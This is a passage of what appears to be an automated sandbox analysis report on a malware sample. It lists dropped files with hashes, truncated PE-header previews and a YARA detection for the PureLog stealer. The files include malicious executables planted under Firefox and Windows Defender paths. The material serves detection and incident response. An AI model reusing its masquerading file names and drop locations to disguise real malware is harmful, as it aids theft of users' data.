                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1356800
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.347838841364752
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:zQVTZu0J1sqjnhMgeiCl7G0nehbGZpbD:EVTZu0Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:96F784C0CF45C5480DCCEF8C5AE28313
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:9F255DB6C668495165B97C20F49AF5A7EBDC9C51
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:D6DDAC6731C7E04BAA3AC2C61306D0EB26DAD4841F51AC9F013FBDDCF07CB19D
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:791DE8A708130DA9D319DEA347550243199862B4A0DAFFC284F402C696A430D367BE5EC7E2043046A8AD336A15F86B1960626629C3514CF5693376357CB70FD5
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................P.......J.... .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...P.......@...t..............@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Mozilla Firefox\minidump-analyzer.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1344000
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.808377495048384
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:OC1vpgXcZHz3sqjnhMgeiCl7G0nehbGZpbD:OC1vpIcNLDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:04595D985D0906478EE29D38D7E602B4
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:939F7C73C95B9A975804AC1F364F48CF8F2F88D2
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:3E9F0564EB593DBD8E1F71C254C7F4FB18891B680FA3A82DA05FE886301D2113
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:7768D4CEFB9DE33325A50FDE26C82A217D40519686CC7FCB6A39DD92A26F35FEE91809073D7B509F91B88AF8E6524761327A489FFAEB9031403AC58FE730E668
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......T...H......0..........@.....................................7.... .........................................................................................T........................r..(....p..8...............`............................text...fS.......T.................. ..`.rdata.......p.......X..............@..@.data....2...@...,..."..............@....pdata...............N..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl..............h...................rsrc................j..............@..@.reloc... ...........r..............@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Mozilla Firefox\pingsender.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1200128
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.140028684628899
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:GSwj7Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:Gv7sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:15D38DEA1DEBAC2E345E30F813B43D12
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:4739815043506407823C9CE894C4EDC5967A26CB
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E003F57BB841A0589F275BEFAF0F1FA55F910EC69212FA127613637BD83678DB
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:DA96E37B3B7224728E0C5F65AD633569C34426D687861097E84E623C4673BB4AB492FCCC5D5AD9F4665793C9F5405FE5B1B108CCFF284A14DD85A23E358BE925
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."..........b......`..........@.......................................... ..........................................................`....... .. ...................t...........................(.......8............................................text............................... ..`.rdata..dM.......N..................@..@.data...............................@....pdata.. .... ......................@..@.00cfg..(....0......................@..@.tls.........@......................@....voltbl......P...........................rsrc........`......................@..@.reloc...P...p...@..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Mozilla Firefox\plugin-container.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1408512
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.4411470466772665
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:CWKntIfGplsqjnhMgeiCl7G0nehbGZpbD:F8IeTDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:9132B914522C04A1623F36FE7CCB64FA
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:50A1F46DC9F890C3C7F98C0B974AF22F3CD7D26A
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B6D9BDE8D1EBB1E0BC071FBBDEED51AB6A444B923715A5C32FC59B07C80B74B0
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:0AAE783E115DD0B9CFC44474446F698EB3EF6686E50D1115AE6C4BE7D8D89B00D23634CDD15BE79C3AC9F4845FFF8418BBAC2433AD609273ED73804EC1F28E82
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......~.....................@....................................tT.... .....................................................@.......P....P.................................................(... ...8...................8........................text...w}.......~.................. ..`.rdata..,...........................@..@.data...0%... ......................@....pdata.......P......................@..@.00cfg..(....p.......*..............@..@.tls.................,..............@....voltbl..................................rsrc...P............0..............@..@.reloc...P.......@...>..............@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Mozilla Firefox\private_browsing.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1185280
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.103280644434671
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:hIhPXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbEm:cPsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:21628F0CC6C8FD7AFDF4F29716AF8A9A
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:6DAB7BCD7933C7DBB9D4020AFDB1A3B4B55CF35E
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:3077E9B9F5566143829125A188751D8695BF4B531197016532CB5BCC9E77FD9C
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:661F4C30F95244250B8AFAA621D7056EFC1A77E1890F38E6CC28335882EDC3566017166E7E811D4C3B464CFDC8B006CD654C948928269CC27ADC77FBAC66B8DE
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e..........".................p..........@.....................................X.... ..................................................6...............`..4....................5..............................`0..8............:..H............................text............................... ..`.rdata.......0......."..............@..@.data........P.......8..............@....pdata..4....`.......:..............@..@.00cfg..(....p.......>..............@..@.voltbl..............@...................rsrc................B..............@..@.reloc...P...0...@..................@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Mozilla Firefox\updater.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1531904
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.421208468027161
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:A8oREwt2ioQ3J+RusqjnhMgeiCl7G0nehbGZpbD:A8oRpoFCDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:9E92F911BBB8A9E30AE5429DB45849DE
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B524CF967517BCAD3240762808B300D3D1A6A4D7
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:CB913440A44AA38EB529EC1E1AE8E4167717BEC48C218CF933BE6E0601DF1C4F
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:6F3F34233228FB9A15DB1DC67F5E0AB52C2DADE6FF5CF56D6B4D6A9D10B4A737016C732D5166922EECF7A1981A4FEFB384820071F0F7EB501D02639922574F56
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......N...........B.........@....................................%O.... ..................................................;.......0..X~....... ...................6..........................(....`..8...........0B..H...H9..`....................text....L.......N.................. ..`.rdata.......`.......R..............@..@.data....>...........h..............@....pdata... ......."...v..............@..@.00cfg..(...........................@..@.tls................................@....voltbl.<..............................._RDATA....... ......................@..@.rsrc...X~...0......................@..@.reloc...P.......@... ..............@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1341952
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.238598741853421
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:If8HQlDMxHwJ07wusqjnhMgeiCl7G0nehbGZpbD:IkHQlqwJ0JDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:46942B7ABE0E510CE6E5A0B565763A4E
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:BB3BF69FDF92E69C3820D8C9F33DD219A10201D7
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:914B136D6C9CB17832C445FF6FF24F77059C3A2DB856C7332AAF473265380473
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:3A950927ABAE312DB2160476430CF3B8A5C9F0BD008C9DEA6DA5D9B9F6AB11A0DDF6F2B55F956E510605F04D91DC02F2E3001F11E271866EFB4D1D1279C00945
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x..............a.......r.......r...............r.......r.......r.......ry......r{......r......Rich....................PE..d...B{.?.........."............................@.......................................... .......... ......................................8b..........................................T.......................(...................@...(...pa..`....................text............................... ..`.rdata..............................@..@.data....&...........z..............@....pdata........... ..................@..@.didat.. ...........................@....rsrc...............................@..@.reloc...P.......@...:..............@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Windows Media Player\wmpnetwk.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1534464
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.124597160827027
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:pSEmYD6gjGPG45QVDkfXplyTyVsqjnhMgeiCl7G0nehbGZpbD:p5mYD6g2GWQVQf3yTODmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:77D79EE69BBFC920C23E46C9B83DC587
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:EBCBBC1B72832D74F71BD43AE22060DEB4AF5FD3
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:2B46DB6266BACC141FF2C37951214CE29BE1777B2EB0E91F64F6069EE6107FF5
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F81A462B0E2D786FDD2B25A59E26E14241E1592A6AB9912344E3B36BB1A9DC6514B73C575ED10443DE109274F9DDC506BD3DFD617E67C024CA6A66083B129C17
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."x..f..Ef..Ef..EoaKEd..Err.De..Err.DB..Err.Dh..Err.D}..Ef..E...Err.D]..Err'Eg..Err.Dg..ERichf..E........................PE..d..."..m.........."..........4......@:.........@.......................................... .......... ..........................................,............`...N.................. ...T...........................p...................X...h...@....................text.............................. ..`.rdata...\.......^..................@..@.data....Y.......8..................@....pdata...N...`...P..................@..@.didat...............l..............@....rsrc................n..............@..@.reloc..............................@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Native_Redline_BTC.exe.log

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):425
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.357964438493834
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khav:ML9E4KQwKDE4KGKZI6Khk
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D8F8A79B5C09FCB6F44E8CFFF11BF7CA
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:669AFE705130C81BFEFECD7CC216E6E10E72CB81
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:91B010B5C9F022F3449F161425F757B276021F63B024E8D8ED05476509A6D406
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:C95CB5FC32843F555EFA7CCA5758B115ACFA365A6EEB3333633A61CA50A90FEFAB9B554C3776FFFEA860FEF4BF47A6103AFECF3654C780287158E2DBB8137767
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TrojanAIbot.exe.log

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):410
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.361827289088002
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:64A2247B3C640AB3571D192DF2079FCF
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:A17AFDABC1A16A20A733D1FDC5DA116657AAB561
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\server_BTC.exe.log

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):410
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.361827289088002
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:64A2247B3C640AB3571D192DF2079FCF
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:A17AFDABC1A16A20A733D1FDC5DA116657AAB561
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2232
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.379401388151058
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:fWSU4xc4RTmaoUeW+gZ9tK8NPZHUxL7u1iMugei/ZPUyus:fLHxcIalLgZ2KRHWLOugss
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:2994C26E803A806022777D377D65DCAB
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:08908C5CB419064AB7F9D6C4A7BB17688B2DAFED
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:D13382ADC1CED6AB3625B6BF89052AB2C6421BE2F2522C6C0D244589E7BA9C7D
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:016517C0A50CF0AE2EED50A188969E887CB98BE009BBCE8B5B6437611769D6324CF8095778497E301855E4DE134297A399E56C42DFCDC073068F813A4CB0431C
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.ConfigurationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.4.................%...K... ...........System.Xml..<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):587776
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.947618401040904
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:vWLLk3UrmqZ4xcVhDoba7m3GTmPe5rmLZNf/lszBaVyYQHm6Fn:v+nrt6xcd7egm2lm7KW4
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:8C8785AC6585CF5C794B74330B3DB88F
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:ED055892B3C942F8C3C4B4F36D6CA8ED58A037A1
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:16212629068CD8F1506D1C90CE6218DABDAC1B5F62B8414DF72F778B0813A8AE
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:223836EBC9968CE6CBACBA1CC772399A55F93F8171A9C7E7A75D7DAEEA540D3273AEC5D1DEA664274D1653AFD1F792FF6C22AB41881411C75B7FA46888763DD4
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.f................................. ... ....@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......dx...:..........h...TX...........................................0..........+.(..bd(.....s....... ....( ...(.... ....( ...o.....ds......o....(.... H...( ...o....o.....s..........io.....o..........9.....o......o...........9.....o......9.....o......*.(....a..w..........}...................v+.(T..T(.....(....(....o....*...0..?.......+.(..?8s...... l...( ...(....o......o......o......o.....(....&*..0..M.......+.(.nW...................... ....( ....... ....( ....... ....(

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bru2mpik.auj.ps1

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cmmvvnlm.0so.psm1

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):60
